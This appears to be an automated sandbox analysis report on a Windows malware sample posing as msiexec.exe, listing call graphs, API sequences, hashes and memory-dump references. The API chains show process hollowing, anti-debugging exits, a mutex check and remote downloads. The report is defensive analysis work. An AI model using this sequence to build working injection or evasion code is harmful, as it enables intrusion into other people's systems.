7ff65d6f2494 ExpandEnvironmentStringsW 1393->1434 1433 7ff65d6f2454 ExpandEnvironmentStringsW 1394->1433 1397 7ff65d6f25be 1397->1396 1400 7ff65d6f2619 CreateProcessW 1397->1400 1400->1396 1401 7ff65d6f2674 1400->1401 1401->1396 1402 7ff65d6f26bb GetFileSize 1401->1402 1403 7ff65d6f26e3 CloseHandle 1402->1403 1404 7ff65d6f26d9 1402->1404 1403->1396 1404->1403 1405 7ff65d6f26f3 VirtualAlloc 1404->1405 1406 7ff65d6f272d ReadFile 1405->1406 1407 7ff65d6f271d CloseHandle 1405->1407 1408 7ff65d6f277d CloseHandle GetThreadContext 1406->1408 1409 7ff65d6f275a VirtualFree CloseHandle 1406->1409 1407->1396 1410 7ff65d6f27e5 ReadProcessMemory GetModuleHandleA GetProcAddress 1408->1410 1411 7ff65d6f27cd VirtualFree 1408->1411 1409->1396 1412 7ff65d6f2868 1410->1412 1411->1396 1413 7ff65d6f2884 VirtualAllocEx 1412->1413 1414 7ff65d6f286c VirtualFree 1412->1414 1415 7ff65d6f28ef VirtualFree 1413->1415 1416 7ff65d6f2907 WriteProcessMemory 1413->1416 1414->1396 1415->1396 1417 7ff65d6f293d VirtualFree 1416->1417 1419 7ff65d6f2955 1416->1419 1417->1396 1418 7ff65d6f298b WriteProcessMemory 1418->1419 1420 7ff65d6f2a16 VirtualFree 1418->1420 1419->1418 1425 7ff65d6f2a33 1419->1425 1420->1396 1421 7ff65d6f2d24 WriteProcessMemory SetThreadContext 1423 7ff65d6f2dbf ResumeThread 1421->1423 1424 7ff65d6f2daa VirtualFree 1421->1424 1422 7ff65d6f2aa5 RtlCompareMemory 1422->1425 1429 7ff65d6f2af8 1422->1429 1426 7ff65d6f2dd1 VirtualFree 1423->1426 1427 7ff65d6f2de6 VirtualFree 1423->1427 1424->1396 1425->1421 1425->1422 1426->1396 1427->1396 1428 7ff65d6f2d1f 1428->1421 1429->1428 1430 7ff65d6f2c28 ReadProcessMemory WriteProcessMemory 1429->1430 1430->1429 1431 7ff65d6f2cfd VirtualFree 1430->1431 1431->1396 1432->1397 1433->1397 1434->1397 1435 7ff65d6f3184 1436 7ff65d6f318d 1435->1436 1437 7ff65d6f31a6 1436->1437 1440 7ff65d6f3004 1436->1440 1445 7ff65d6f2e04 CreateMutexA 1440->1445 1443 7ff65d6f3064 Sleep 1443->1436 1444 7ff65d6f301f Sleep CreateThread WaitForSingleObject 1444->1443 1446 7ff65d6f2e30 ReleaseMutex CloseHandle 1445->1446 1447 7ff65d6f2e4d GetLastError 1445->1447 1450 7ff65d6f2e8f 1446->1450 1448 7ff65d6f2e5a ReleaseMutex CloseHandle 1447->1448 1449 7ff65d6f2e77 ReleaseMutex CloseHandle 1447->1449 1448->1450 1449->1450 1450->1443 1450->1444 1451 7ff65d6f3074 1456 7ff65d6f307d 1451->1456 1452 7ff65d6f3169 1454 7ff65d6f3bec RegDeleteKeyW 1454->1456 1455 7ff65d6f3dec 9 API calls 1455->1456 1456->1452 1456->1454 1456->1455 1457 7ff65d6f3159 Sleep 1456->1457 1458 7ff65d6f440c 1456->1458 1457->1456 1460 7ff65d6f445a 1458->1460 1459 7ff65d6f44a2 1459->1456 1460->1459 1464 7ff65d6f438c SetFilePointer WriteFile SetEndOfFile 1460->1464 1462 7ff65d6f4483 CloseHandle 1462->1459 1464->1462 1485 7ff65d6f3344 1486 7ff65d6f24d4 35 API calls 1485->1486 1487 7ff65d6f3354 1486->1487 1384 7ff65d6f1088 GetModuleHandleA GetProcAddress 1385 7ff65d6f10bb 1384->1385 1465 7ff65d6f2168 1466 7ff65d6f2192 InternetOpenW 1465->1466 1467 7ff65d6f21bf Sleep 1466->1467 1468 7ff65d6f21cc InternetOpenUrlW 1466->1468 1467->1466 1469 7ff65d6f2255 HttpQueryInfoA 1468->1469 1470 7ff65d6f2203 InternetOpenUrlW 1468->1470 1472 7ff65d6f2284 InternetCloseHandle InternetCloseHandle Sleep 1469->1472 1473 7ff65d6f22aa 1469->1473 1470->1469 1471 7ff65d6f223a InternetCloseHandle Sleep 1470->1471 1471->1466 1472->1466 1474 7ff65d6f22b4 InternetCloseHandle InternetOpenUrlW 1473->1474 1475 7ff65d6f2311 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1473->1475 1474->1475 1476 7ff65d6f22f6 InternetCloseHandle Sleep 1474->1476 1477 7ff65d6f2390 1475->1477 1478 7ff65d6f2376 InternetCloseHandle InternetCloseHandle 1475->1478 1476->1466 1480 7ff65d6f2398 InternetReadFile 1477->1480 1481 7ff65d6f23e6 InternetCloseHandle InternetCloseHandle 1477->1481 1479 7ff65d6f240f 1478->1479 1480->1477 1480->1481 1481->1479

                                                                                                                                                                                                                                  Callgraph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                                                                  callgraph 0 Function_00007FF65D6F36B4 1 Function_00007FF65D6F31B4 2 Function_00007FF65D6FE6B4 3 Function_00007FF65D7000B0 4 Function_00007FF65D6F3CAC 5 Function_00007FF65D6F40AC 65 Function_00007FF65D6F3B1C 5->65 87 Function_00007FF65D6F3AEC 5->87 6 Function_00007FF65D6FE4AB 7 Function_00007FF65D6FFEA9 8 Function_00007FF65D6FE0A5 9 Function_00007FF65D6F2EA4 10 Function_00007FF65D6F32A4 19 Function_00007FF65D6F388C 10->19 20 Function_00007FF65D6F408C 10->20 62 Function_00007FF65D6F452C 10->62 63 Function_00007FF65D6F3C2C 10->63 99 Function_00007FF65D6F10D8 10->99 11 Function_00007FF65D6F33A4 12 Function_00007FF65D6FF6A3 13 Function_00007FF65D7001A2 14 Function_00007FF65D6FE0A1 15 Function_00007FF65D6FCE9D 16 Function_00007FF65D6F149C 17 Function_00007FF65D6F2494 18 Function_00007FF65D6FDA94 69 Function_00007FF65D6F370C 19->69 102 Function_00007FF65D6F3FCC 20->102 21 Function_00007FF65D6F438C 22 Function_00007FF65D6FE289 23 Function_00007FF65D6F1088 24 Function_00007FF65D6F3384 101 Function_00007FF65D6F24D4 24->101 25 Function_00007FF65D6F3184 73 Function_00007FF65D6F3004 25->73 26 Function_00007FF65D6FE07F 27 Function_00007FF65D6F147F 28 Function_00007FF65D6F397C 29 Function_00007FF65D6FE079 30 Function_00007FF65D6FB778 31 Function_00007FF65D6FB776 32 Function_00007FF65D6F3074 32->28 51 Function_00007FF65D6F3B4C 32->51 70 Function_00007FF65D6F440C 32->70 88 Function_00007FF65D6F3BEC 32->88 89 Function_00007FF65D6F3DEC 32->89 33 Function_00007FF65D6FEA72 34 Function_00007FF65D6FB772 35 Function_00007FF65D6FEC71 36 Function_00007FF65D6FB26F 37 Function_00007FF65D6F2168 38 Function_00007FF65D6FE668 39 Function_00007FF65D6F3364 39->101 40 Function_00007FF65D6FB061 41 Function_00007FF65D6FB05A 42 Function_00007FF65D6FD65A 43 Function_00007FF65D6FFE5A 44 Function_00007FF65D6F2454 45 Function_00007FF65D6F3555 46 Function_00007FF65D6FB052 47 Function_00007FF65D6FB152 48 Function_00007FF65D6FC14F 49 Function_00007FF65D6FB04E 50 Function_00007FF65D6F424C 50->65 52 Function_00007FF65D6FF74B 53 Function_00007FF65D6FF749 54 Function_00007FF65D6FB248 55 Function_00007FF65D6FF747 56 Function_00007FF65D6F3344 56->101 57 Function_00007FF65D6F1444 58 Function_00007FF65D6F153C 58->16 86 Function_00007FF65D6F14EC 58->86 59 Function_00007FF65D6F3A3C 59->19 59->28 59->69 60 Function_00007FF65D6FDC37 61 Function_00007FF65D6F2F34 61->19 61->20 61->62 61->63 61->99 109 Function_00007FF65D6F44BC 62->109 64 Function_00007FF65D6FEC20 66 Function_00007FF65D6F3414 66->1 66->4 66->5 66->10 66->11 66->58 66->59 68 Function_00007FF65D6F3214 66->68 85 Function_00007FF65D6F41EC 66->85 96 Function_00007FF65D6F3EDC 66->96 67 Function_00007FF65D6F2414 68->19 78 Function_00007FF65D6F42FC 68->78 97 Function_00007FF65D6F36DC 69->97 70->21 71 Function_00007FF65D6FD70B 72 Function_00007FF65D6FEC09 74 Function_00007FF65D6F2E04 73->74 75 Function_00007FF65D6FEA05 76 Function_00007FF65D6FDE04 77 Function_00007FF65D6F1000 78->50 79 Function_00007FF65D6FBBFB 80 Function_00007FF65D6FBBF9 81 Function_00007FF65D6FC4F8 82 Function_00007FF65D6FBBF7 83 Function_00007FF65D6FE9F6 84 Function_00007FF65D6FBBF2 90 Function_00007FF65D6FD2E7 91 Function_00007FF65D6FF7E6 92 Function_00007FF65D6FD2E5 93 Function_00007FF65D6FC2E4 94 Function_00007FF65D6FD2E3 95 Function_00007FF65D6FCCE1 98 Function_00007FF65D7001DA 99->57 99->77 104 Function_00007FF65D6F13C4 99->104 100 Function_00007FF65D6FB0D8 101->17 101->44 101->67 103 Function_00007FF65D6FE6CD 105 Function_00007FF65D6F36C4 106 Function_00007FF65D6FE6C5 107 Function_00007FF65D6F35C1 108 Function_00007FF65D6FB2C0 110 Function_00007FF65D6FEDB8

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00007FF65D6F3414 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 231 7ff65d6f3414-7ff65d6f342a call 7ff65d6f153c call 7ff65d6f31b4 236 7ff65d6f3434-7ff65d6f3462 call 7ff65d6f40ac call 7ff65d6f3cac call 7ff65d6f3edc 231->236 237 7ff65d6f342c-7ff65d6f342e ExitProcess 231->237 244 7ff65d6f3464-7ff65d6f3475 call 7ff65d6f41ec 236->244 245 7ff65d6f34b3-7ff65d6f34c6 call 7ff65d6f3edc 236->245 250 7ff65d6f348a-7ff65d6f348c ExitProcess 244->250 251 7ff65d6f3477-7ff65d6f3488 call 7ff65d6f41ec 244->251 252 7ff65d6f3504-7ff65d6f3517 call 7ff65d6f3edc 245->252 253 7ff65d6f34c8-7ff65d6f34d9 call 7ff65d6f41ec 245->253 251->250 262 7ff65d6f3492 call 7ff65d6f32a4 251->262 263 7ff65d6f355a-7ff65d6f3570 call 7ff65d6f3a3c call 7ff65d6f33a4 252->263 264 7ff65d6f3519-7ff65d6f352a call 7ff65d6f41ec 252->264 260 7ff65d6f34e3 call 7ff65d6f3214 253->260 261 7ff65d6f34db-7ff65d6f34dd ExitProcess 253->261 269 7ff65d6f34e8-7ff65d6f34ed 260->269 271 7ff65d6f3497-7ff65d6f349c 262->271 283 7ff65d6f3572-7ff65d6f3583 call 7ff65d6f41ec 263->283 284 7ff65d6f35c6-7ff65d6f369e CreateThread * 3 WaitForMultipleObjects ExitProcess 263->284 278 7ff65d6f3534 call 7ff65d6f3214 264->278 279 7ff65d6f352c-7ff65d6f352e ExitProcess 264->279 273 7ff65d6f34ef-7ff65d6f34fa Sleep 269->273 274 7ff65d6f34fc-7ff65d6f34fe ExitProcess 269->274 276 7ff65d6f349e-7ff65d6f34a9 Sleep 271->276 277 7ff65d6f34ab-7ff65d6f34ad ExitProcess 271->277 273->269 276->271 282 7ff65d6f3539-7ff65d6f353e 278->282 285 7ff65d6f3540-7ff65d6f354b Sleep 282->285 286 7ff65d6f354d-7ff65d6f354f ExitProcess 282->286 289 7ff65d6f3585-7ff65d6f3596 call 7ff65d6f41ec 283->289 290 7ff65d6f3598-7ff65d6f359a ExitProcess 283->290 285->282 289->290 293 7ff65d6f35a0 call 7ff65d6f32a4 289->293 295 7ff65d6f35a5-7ff65d6f35aa 293->295 296 7ff65d6f35ac-7ff65d6f35b7 Sleep 295->296 297 7ff65d6f35b9-7ff65d6f35bb ExitProcess 295->297 296->295
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                                                                                  • Opcode ID: 94fdef9fd40db2a2ae93ff737b0317b91bf11b3ef053d9ed0626aec32107028d
                                                                                                                                                                                                                                  • Instruction ID: ae6dcf7346936f10304d8ef9165c6f56dff7366e80d1bb7138f25f49296e1f28
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94fdef9fd40db2a2ae93ff737b0317b91bf11b3ef053d9ed0626aec32107028d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF610861E1CE4381FB64AB21E8553BA62A0BF85340F480135D54EE66EEFF3DE54BE610
                                                                                                                                                                                                                                  Function 00007FF65D6F40AC Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                                                                                  • Opcode ID: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction ID: 5afdd480015af3fcbf070c742124e177e73cdd927983f477f3613f6860521310
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2dc5b7a4c2ac788fed40c1e4fd08826e44c1b763e7fe3fa29ec32dd5f663f271
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7312A72A1CA8286DB50CB15E45072AB770FBD5780F145035FA8E93BACEF3DE4469B00
                                                                                                                                                                                                                                  Function 00007FF65D6F31B4 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                                                                                  • Opcode ID: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction ID: c883ce0ab4df4fa2147beb2ef17de35f2445631b0b06174e0cbdbff1c9995c69
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fb95f8ef0bc2ecc5dce42075ca2d6b9f5b34f365682c0d1478ff1e2aa5af605c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF05E61D0CA83C1EB308B65A4143796BA0BB46708F0C11B4D58DA66DCEF7CE54AEB11
                                                                                                                                                                                                                                  Function 00007FF65D6F41EC Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                                                                                  • Opcode ID: 6cd4be96b73e2e358251bb5f19c04d187c7d5a97317c3e6dfd68f5ff4f2f9845
                                                                                                                                                                                                                                  • Instruction ID: 65ceff44bf82034d01bc43d277f1725c4bb17a56e6966e2a337a055895fab538
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd4be96b73e2e358251bb5f19c04d187c7d5a97317c3e6dfd68f5ff4f2f9845
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03F03021D0CE8382EA70DB90A40537A2370FB95300F540574D58EA2BE8DF3DE447A601
                                                                                                                                                                                                                                  Function 00007FF65D6F14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 328 7ff65d6f14ec-7ff65d6f1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                                                                                  • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction ID: 77463c6825c0676d447162ae90bf38267d7c253ed3f4a1cc4d12d37055d93b3d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30E09276A08F81C6CA209B15F84001AB7B4FBC8794F944125EACD82B28DF3CC1A5CB04
                                                                                                                                                                                                                                  Function 00007FF65D6F3AEC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 329 7ff65d6f3aec-7ff65d6f3afb 330 7ff65d6f3b10-7ff65d6f3b14 329->330 331 7ff65d6f3afd-7ff65d6f3b0a VirtualFree 329->331 331->330
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403890702.00007FF65D6F8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404001391.00007FF65D6F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1404135799.00007FF65D6FB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_7ff65d6f0000_msiexec.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction ID: 257539dd7b35471b8b78e7d24802ad403c579d9c5705b81b051cc4ae9d1fd440
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030cb471ab07ba67b75c17a021bb035fd128cd39a350b8677565999cf01361e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12D01221F3CD4381E794EB26E89971A67A0FBC4744F448135E689815A8DF3CC0DA8F00

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 00007FF65D6F24D4 Relevance: 63.4, APIs: 32, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 332 7ff65d6f24d4-7ff65d6f254e GetModuleFileNameW 333 7ff65d6f2555-7ff65d6f2591 332->333 334 7ff65d6f2550 332->334 336 7ff65d6f2593-7ff65d6f259b 333->336 337 7ff65d6f25a9-7ff65d6f25c5 call 7ff65d6f2414 333->337 335 7ff65d6f2df9-7ff65d6f2e01 334->335 338 7ff65d6f259d-7ff65d6f25a5 336->338 339 7ff65d6f25c7-7ff65d6f25e3 call 7ff65d6f2454 336->339 346 7ff65d6f2608-7ff65d6f2612 337->346 341 7ff65d6f25e5-7ff65d6f2601 call 7ff65d6f2494 338->341 342 7ff65d6f25a7-7ff65d6f2603 338->342 339->346 341->346 342->335 349 7ff65d6f2614 346->349 350 7ff65d6f2619-7ff65d6f266d CreateProcessW 346->350 349->335 352 7ff65d6f2674-7ff65d6f26b4 350->352 353 7ff65d6f266f 350->353 355 7ff65d6f26bb-7ff65d6f26d7 GetFileSize 352->355 356 7ff65d6f26b6 352->356 353->335 357 7ff65d6f26e3-7ff65d6f26ee CloseHandle 355->357 358 7ff65d6f26d9-7ff65d6f26e1 355->358 356->335 357->335 358->357 359 7ff65d6f26f3-7ff65d6f271b VirtualAlloc 358->359 360 7ff65d6f272d-7ff65d6f2758 ReadFile 359->360 361 7ff65d6f271d-7ff65d6f2728 CloseHandle 359->361 362 7ff65d6f277d-7ff65d6f27cb CloseHandle GetThreadContext 360->362 363 7ff65d6f275a-7ff65d6f2778 VirtualFree CloseHandle 360->363 361->335 364 7ff65d6f27e5-7ff65d6f286a ReadProcessMemory GetModuleHandleA GetProcAddress 362->364 365 7ff65d6f27cd-7ff65d6f27e0 VirtualFree 362->365 363->335 367 7ff65d6f2884-7ff65d6f28ed VirtualAllocEx 364->367 368 7ff65d6f286c-7ff65d6f287f VirtualFree 364->368 365->335 369 7ff65d6f28ef-7ff65d6f2902 VirtualFree 367->369 370 7ff65d6f2907-7ff65d6f293b WriteProcessMemory 367->370 368->335 369->335 371 7ff65d6f2955-7ff65d6f2960 370->371 372 7ff65d6f293d-7ff65d6f2950 VirtualFree 370->372 373 7ff65d6f2972-7ff65d6f2985 371->373 372->335 374 7ff65d6f2a33-7ff65d6f2a7a 373->374 375 7ff65d6f298b-7ff65d6f2a14 WriteProcessMemory 373->375 378 7ff65d6f2a8c-7ff65d6f2a9f 374->378 376 7ff65d6f2a2e 375->376 377 7ff65d6f2a16-7ff65d6f2a29 VirtualFree 375->377 376->373 377->335 379 7ff65d6f2d24-7ff65d6f2da8 WriteProcessMemory SetThreadContext 378->379 380 7ff65d6f2aa5-7ff65d6f2af4 RtlCompareMemory 378->380 382 7ff65d6f2dbf-7ff65d6f2dcf ResumeThread 379->382 383 7ff65d6f2daa-7ff65d6f2dbd VirtualFree 379->383 384 7ff65d6f2af8-7ff65d6f2b21 380->384 385 7ff65d6f2af6 380->385 387 7ff65d6f2dd1-7ff65d6f2de4 VirtualFree 382->387 388 7ff65d6f2de6-7ff65d6f2df3 VirtualFree 382->388 383->335 389 7ff65d6f2b2c-7ff65d6f2b3a 384->389 385->378 387->335 388->335 390 7ff65d6f2b40-7ff65d6f2bcb 389->390 391 7ff65d6f2d1f 389->391 392 7ff65d6f2bdd-7ff65d6f2beb 390->392 391->379 393 7ff65d6f2bf1-7ff65d6f2c24 392->393 394 7ff65d6f2d1a 392->394 395 7ff65d6f2c28-7ff65d6f2cfb ReadProcessMemory WriteProcessMemory 393->395 396 7ff65d6f2c26 393->396 394->389 398 7ff65d6f2d15 395->398 399 7ff65d6f2cfd-7ff65d6f2d10 VirtualFree 395->399 396->392 398->394 399->335
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000D.00000002.1403750476.00007FF65D6F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF65D6F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403696494.00007FF65D6F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000D.00000002.1403837976.00007FF65D6F5000.00000002.00000400.00020000.00000000.sdmpDownload File
